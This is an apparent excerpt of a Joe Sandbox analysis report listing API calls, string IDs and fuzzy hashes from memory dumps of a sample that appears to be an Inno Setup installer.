                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                          • API String ID: 667068680-222143506
                                                                          • Opcode ID: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                          • Instruction ID: cfeeddb06e0de6ce6ebab5647243e6050a865ade16457065002c887e192085cf
                                                                          • Opcode Fuzzy Hash: 72b63ccca095d4596e185588666964d96aa2feb47b4604f739c524890b31c532
                                                                          • Instruction Fuzzy Hash: 1BC012E0245700EDDA00B7F12CC3D772558D550F24750843B705879183D77C1C008F2C
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B755
                                                                          • 73A0A570.USER32(?), ref: 0041B761
                                                                          • 73A08830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                          • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                          • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                          • 73A08830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A08830$A022A16310A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3731147114-0
                                                                          • Opcode ID: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                          • Instruction ID: e4fa2330707e2e3496a7563b6e1a8945dd65194040c1b513b55e56702052f46b
                                                                          • Opcode Fuzzy Hash: 93e68c4b9a3bd67db3154bc0fc4d8c0f4444c0b5e7637da7f247583ea3dba257
                                                                          • Instruction Fuzzy Hash: 33512D74A00208AFCB11DFA9C855AEEBBF9FF49704F104466F504A7390D7789981CBA9
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041BA27
                                                                          • 73A0A570.USER32(?), ref: 0041BA33
                                                                          • 73A08830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                          • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                          • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                          • 73A08830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A08830$A022A16310A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3731147114-0
                                                                          • Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                          • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                          • Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                          • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B58E
                                                                          • 73A0A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                          • 73A14620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                          • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                          • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                          • 73A0A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: E680$A14620A480A570Focus
                                                                          • String ID:
                                                                          • API String ID: 932946509-0
                                                                          • Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                          • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                          • Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                          • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                          APIs
                                                                          • SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                          • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                          • API String ID: 1452528299-1580325520
                                                                          • Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                          • Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
                                                                          • Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                          • Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                          • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                          • 73A14620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                          • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                          • 73A0A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A14620MetricsSystem$A480A570
                                                                          • String ID:
                                                                          • API String ID: 1130675633-0
                                                                          • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                          • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                          • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                          • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
                                                                          • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
                                                                          • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Show
                                                                          • String ID:
                                                                          • API String ID: 3609083571-0
                                                                          • Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                          • Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
                                                                          • Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                          • Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49
                                                                          APIs
                                                                            • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                          • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                          • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                          • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                            • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                          • String ID:
                                                                          • API String ID: 3527656728-0
                                                                          • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                          • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                          • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                          • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle
                                                                          • String ID: $pI$.tmp$}RI
                                                                          • API String ID: 3498533004-1860564545
                                                                          • Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                          • Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
                                                                          • Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                          • Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD
                                                                          APIs
                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                          • ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256
                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                            • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                            • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                          • String ID: .dat$.msg$IMsg$Uninstall
                                                                          • API String ID: 3312786188-1660910688
                                                                          • Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                          • Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
                                                                          • Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                          • Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
                                                                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$Attributes$Move
                                                                          • String ID: $pI$isRS-%.3u.tmp
                                                                          • API String ID: 3839737484-4128586672
                                                                          • Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                          • Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
                                                                          • Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                          • Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                          • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                          • API String ID: 828529508-2866557904
                                                                          • Opcode ID: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                          • Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
                                                                          • Opcode Fuzzy Hash: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                          • Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                          • RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                          • RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID: Mj
                                                                          • API String ID: 730355536-209792402
                                                                          • Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                          • Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
                                                                          • Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                          • Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF
                                                                          APIs
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF
                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4
                                                                            • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesDeleteErrorLastMove
                                                                          • String ID: $pI$DeleteFile$MoveFile
                                                                          • API String ID: 3024442154-1403374609
                                                                          • Opcode ID: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                          • Instruction ID: 0b1c975e4cad0da58cdf6a339e0cc25f4cbee2301ce5bab719f8a23037a79807
                                                                          • Opcode Fuzzy Hash: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                          • Instruction Fuzzy Hash: D4F062742141456AEB11FFA6D95266E67ECEB4434BFA0443BF800B76C3DA3C9E094929
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                          • InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                          • String ID: ChangeWindowMessageFilter$user32.dll
                                                                          • API String ID: 3478007392-2498399450
